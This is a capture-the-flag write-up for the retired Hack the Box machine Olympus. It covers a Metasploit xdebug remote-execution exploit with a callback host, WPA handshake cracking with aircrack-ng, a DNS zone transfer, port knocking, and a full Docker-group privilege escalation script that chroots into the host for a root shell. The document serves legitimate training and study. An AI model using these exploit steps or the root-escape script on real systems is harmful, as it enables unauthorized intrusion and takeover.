Hack the Box Writeup - Olympus
This post details the epic journey undertaken to meet with the ancient greek gods, represented here by the retired Hack the Box machine, Olympus.
This post details the epic journey undertaken to meet with the ancient greek gods, represented here by the retired Hack the Box machine, Olympus.
Enumeration
As pretty much always, we begin with our initial enumeration using nmap.
$ nmap -sC -sV -p- -oA nmap/scan 10.10.10.83
Some interesting results here; a filtered ssh port, DNS Bind running on tcp port 53, http running, and yet another ssh service running on 2222 with an interesting fingerprint string.
Let's start with the HTTP service. Browsing to the site presents us with an image of Zeus and not much else. So lets take a closer look at what is going on using Burp.
Exploit
Looking at the response in Burp we find an interesting and uncommon header, xdebug. A quick google shows that this is an extension for PHP to assist with debugging and development i.e. something which should never go into production, and that version 2.5.5 and below have a Remote Command Execution exploit available. If your metasploit is up to date then we even have the exploit ready to go.
> use exploit/unix/http/xdebug_unauth_exec
> set rhost 10.10.10.83
> set lhost 10.10.14.15
> set lport 4444
> exploit
More Enumeration
And that gives us a meterpreter session, however the shell is very basic and is lacking a lot of commands such as python, so we can't really improve it. Fortunately, something stands out fairly quickly in our enumeration. There is a tool called airgeddon sitting in the home folder, and there already seems to be a nice packet capture sat in the captured directory.
Along with the packet capture is a text file which states Captured while flying. I'll banish him to Olympia - Zeus. Referring back to our nmap scan, could this Olympia be referring to the second ssh service with the interesting fingerprint string?
Closing the shell and returning to the meterpreter session we can download the packet capture to our machine using the following command:
> download /home/zeus/airgeddon/captured/captured.cap
Cracking
Now we can open it in Wireshark, and looking at the packets it is fairly obvious that it is all Wireless 802.11 traffic. So lets see what we can see.
The first thing that we make note of is the SSID of the wireless network being broadcast, Too_cl0se_to_th3_Sun.
Next, setting the display filter to eapol and scrolling through the results show us that we have a full 4 way handshake towards the end of the file, meaning we can use aircrack-ng to attempt to brute-force the pre-shared key.
Make a note of the MAC address of the access point (the BSS ID), and then run the following:
$ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b f4:ec:38:ab:a8:a9 captured.cap
This may take some time, so go and make yourself some nectar of the gods, or whatever else you fancy drinking.
After a while we get a result. The pre-shared key passphrase is flightoficarus.
So let's make some educated guesses here, given the wireless passphrase of flightoficarus, could our ssh username be icarus, and could the SSID be the password?
It is! That took me an embarrassingly long time to link in my head.
Further Enumeration
In the home directory of this new user is a single text file, called help_of_the_gods.txt. It contains the message:
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb
That last line looks suspiciously like a domain name. Maybe we can use that with the DNS service on TCP port 53. So bring up another terminal on your host machine and lets see if we can get a zone transfer.
$ dig axfr @10.10.10.83 ctfolympus.htb
; <<>> DiG 9.11.3-1-Debian <<>> axfr @10.10.10.83 ctfolympus.htb
; (1 server found)
;; global options: +cmd
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
mail.ctfolympus.htb. 86400 IN A 192.168.0.120
ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 24 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Thu May 10 10:39:36 EDT 2018
;; XFR size: 15 records (messages 1, bytes 475)
Take a close look at the TXT entry near the top of the results. That clue leads me to think that the currently filtered ssh service on port 22 could be opened temporarily, and those numbers given suggest to me that the way to open it is to use a technique called port knocking.
Knock, Knock
We can test our theory with a single line bash script.
$ for x in 3456 8234 62431; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.83; done
$ ssh [email protected]
Then using the username prometheus and the password of St34l_th3_F1re!, we are in. We have gained access to Hades, and access to the first flag! Our epic journey is almost at an end.
Yet More Enumeration
Enumerating this machine, we can see that our current user is a member of the Docker group (which explains all those other limited shells we were stuck in, they were all Docker containers), and checking on the running services we can see that Docker is installed and running. Some more googling of privilege escalation vectors soon leads me to the following article, privilege escalation via docker.
The page links through to a github repository so we can download and modify the Dockerfile and the script it uses - this is because this machine does not have access to the internet to be able to download the images directly.
Root Exploit
So we create a directory for our docker image, and then create a Dockerfile:
#
# Dockerfile
#
FROM ubuntu:14.04
COPY exploit.sh /exploit.sh
CMD ["/bin/bash", "exploit.sh"]
Note the FROM line in there. We need to change it as we are unable to download this image. A quick docker images command shows us what is installed, so we can modify the Dockerfile to the following:
#
# Dockerfile
#
FROM olympia
COPY exploit.sh /exploit.sh
CMD ["/bin/bash", "exploit.sh"]
Then we create the exploit.sh containing the following:
#
#
#
if [ ! -d "/hostOS" ]; then
echo
echo ==== ERROR ====
echo It looks like /hostOS does not exist
echo Please run this docker image with a /hostOS volume mounted to /
echo For example: docker run -v /:/hostOS -i -t exploitapp
echo
exit
fi
if [ ! -e "/hostOS/bin/sh" ]; then
echo
echo ==== ERROR ====
echo It looks like /hostOS does not contain a root filesystem
echo Please run this docker image with a /hostOS volume mounted to /
echo For example: docker run -v /:/hostOS -i -t exploitapp
echo
exit
fi
echo
echo You should now have a root shell on the host OS
echo Press Ctrl-D to exit the docker instance / shell
chroot /hostOS /bin/sh
Now tie it all up in a bow:
$ docker build -t rootplease .
$ docker run -v /:/hostOS -i -t rootplease
And there we go, root and access to the final flag. Our epic journey to mount Olympus is complete.